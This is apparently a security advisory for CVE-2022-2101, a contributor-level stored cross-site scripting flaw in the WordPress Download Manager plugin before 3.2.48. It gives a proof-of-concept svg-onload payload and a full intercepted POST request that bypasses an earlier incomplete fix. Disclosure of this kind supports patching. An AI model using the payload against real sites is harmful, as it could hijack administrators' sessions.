Download Manager < 3.2.48 – Contributor+ Stored Cross-Site Scripting | CVE 2022-2101

Description

The plugin does not sanitise and escape the 'Insert URL' field, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks.

Note: The attempted fix made in 3.2.46 and 3.2.47 were found to be insufficient

Proof of Concept

As a contributor, create/edit a download and put the following payload in the 'Insert URL" field: https://example.com/?a="><svg/onload=alert(/XSS/)>

Then click on the + button next to the field to save the URL and click on the Submit for Review button

The XSS will be triggered when editing the Download (for example when an admin will review it)

In 3.2.47, the attack is still possible by adding a dummy URL, then intercepting the request made when saving the File Post and changing the file[files][] parameter to https://example.com/?a="><svg/onload=alert(/XSS/)>:


POST /wp-admin/post.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1887
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

_wpnonce=d1f3acca93&user_ID=1&action=editpost&originalaction=editpost&post_author=5&post_type=wpdmpro&original_post_status=publish&post_ID=6324&meta-box-order-nonce=0df29a4137&closedpostboxesnonce=ac72c29968&post_title=XSS+Contrib&samplepermalinknonce=db423b3cbb&content=&file%5Bfiles%5D%5B%5D=https%3a%2f%2fexample.com%2f%3fa%3d%22%3e%3csvg%2fonload%3dalert(%2fXSS%2f)%3e&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=06&jj=30&aa=2022&hh=22&mn=21&ss=28&hidden_mm=06&cur_mm=06&hidden_jj=30&cur_jj=30&hidden_aa=2022&cur_aa=2022&hidden_hh=22&cur_hh=22&hidden_mn=21&cur_mn=21&original_publish=Update&save=Update&tax_input%5Bwpdmcategory%5D%5B%5D=0&newwpdmcategory=New+Category+Name&newwpdmcategory_parent=-1&_ajax_nonce-add-wpdmcategory=67f0ab91c8&tax_input%5Bwpdmtag%5D=&newtag%5Bwpdmtag%5D=&_thumbnail_id=-1&excerpt=&metakeyselect=%23NONE%23&metakeyinput=&metavalue=&_ajax_nonce-add-meta=925d3f1564&advanced_view=1&comment_status=open&add_comment_nonce=d2ac60592b&_ajax_fetch_list_nonce=608563959a&post_name=xss-contrib&post_author_override=5&file%5Bversion%5D=&file%5Blink_label%5D=&file%5Bquota%5D=&file%5Bview_count%5D=1&file%5Bdownload_count%5D=&file%5Bpackage_size%5D=&file%5Baccess%5D%5B%5D=guest&file%5Bpage_template%5D=page-template-default.php&file%5Bterms_page%5D=&file%5Bterms_title%5D=&file%5Bterms_conditions%5D=&file%5Bterms_check_label%5D=&file%5Bpassword%5D=&file%5Bicon%5D=